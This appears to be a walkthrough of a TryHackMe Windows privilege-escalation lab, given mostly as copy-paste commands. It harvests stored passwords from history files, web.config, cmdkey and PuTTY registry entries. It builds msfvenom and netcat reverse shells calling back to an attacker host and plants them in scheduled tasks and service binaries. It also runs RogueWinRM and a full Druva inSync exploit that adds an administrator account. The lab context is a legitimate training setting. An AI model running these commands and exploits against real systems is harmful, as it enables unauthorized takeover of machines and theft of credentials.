Room Link: https://tryhackme.com/room/windowsprivesc20
Harvesting Passwords from Usual Spots
A password for the julia.jones user has been left on the Powershell history. What is the password?
Victim(cmd)
Copy type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?
Victim(cmd)
Copy type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.
Victim(cmd)
Copy cmdkey /list
runas /savecred /user:WPRIVESC1\mike.katz cmd.exe Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?
Victim(cmd)
Copy reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s Other Quick Wins
What is the taskusr1 flag?
Victim(cmd)
Copy schtasks /query /tn vulntask /fo list /v Victim(cmd)
Copy icacls c:\tasks\schtask.bat Victim(cmd)
Copy icacls c:\tasks\schtask.bat Kali
Victim
Copy echo c:\tools\nc64.exe -e cmd.exe $KALI 4444 > C:\tasks\schtask.bat
schtasks /run /tn vulntask Abusing Service Misconfigurations
Insecure Permissions on Service Executable
Get the flag on svcusr1's desktop
Victim(cmd)
Copy sc qc WindowsScheduler Victim(cmd)
Copy icacls C:\PROGRA~2\SYSTEM~1\WService.exe Kali
Copy msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4445 -f exe-service -o rev-svc.exe
python2 -m SimpleHTTPServer 81 Victim(Powershell)
Copy wget http://$KALI:81/rev-svc.exe -O rev-svc.exe Once the payload is in the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we'll want to grant full permissions to the Everyone group as well.
Victim(Powershell)
Copy cd C:\PROGRA~2\SYSTEM~1\
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F Kali
Note: PowerShell has sc as an alias to Set-Content, therefore you need to use sc.exe in order to control services with PowerShell this way.
As a result, you'll get a reverse shell with svcusr1 privileges:
Victim(cmd)
Copy sc stop windowsscheduler
sc start windowsscheduler OR
Victim(Powershell)
Copy sc.exe stop windowsscheduler
sc.exe start windowsscheduler Unquoted Service Paths
Victim(cmd)
Copy sc qc "disk sorter enterprise" Kali
Copy msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4446 -f exe-service -o rev-svc2.exe
python2 -m SimpleHTTPServer 81 Victim(Powershell)
Copy wget http://10.10.15.215:81/rev-svc2.exe -O rev-svc2.exe
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F Kali
Victim(cmd)
Copy sc.exe stop "disk sorter enterprise"
sc.exe start "disk sorter enterprise" Insecure Service Permissions
Victim(cmd)
Copy cd C:\tools\AccessChk
accesschk64.exe -qlc thmservice Kali
Copy msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4447 -f exe-service -o rev-svc3.exe
python2 -m SimpleHTTPServer 81 Victim(Powershell)
Copy wget http://10.10.15.215:81/rev-svc3.exe -O rev-svc3.exe Kali
Victim(Powershell)
Copy icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
sc.exe config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
sc.exe stop THMService
sc.exe start THMService Abusing dangerous privileges
Kali
Victim(Browser)
Copy c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe 10.10.22.165 4442" Abusing vulnerable software
Case Study: Druva inSync 6.6.3
Druva_inSync_exploit.ps1
Copy $ErrorActionPreference = "Stop"
$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"
$s = New-Object System.Net.Sockets.Socket(
[System.Net.Sockets.AddressFamily]::InterNetwork,
[System.Net.Sockets.SocketType]::Stream,
[System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);
$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command) Victim
Copy cd C:\tools\
.\Druva_inSync_exploit.ps1 Victim(Powershell)
Copy runas /user:pwned "C:\Windows\system32\cmd.exe"
Enter the password for pwnd: SimplePass123 Victim(cmd)
Copy powershell.exe -Command "Start-Process cmd "/k cd /d %cd%" -Verb RunAs" 
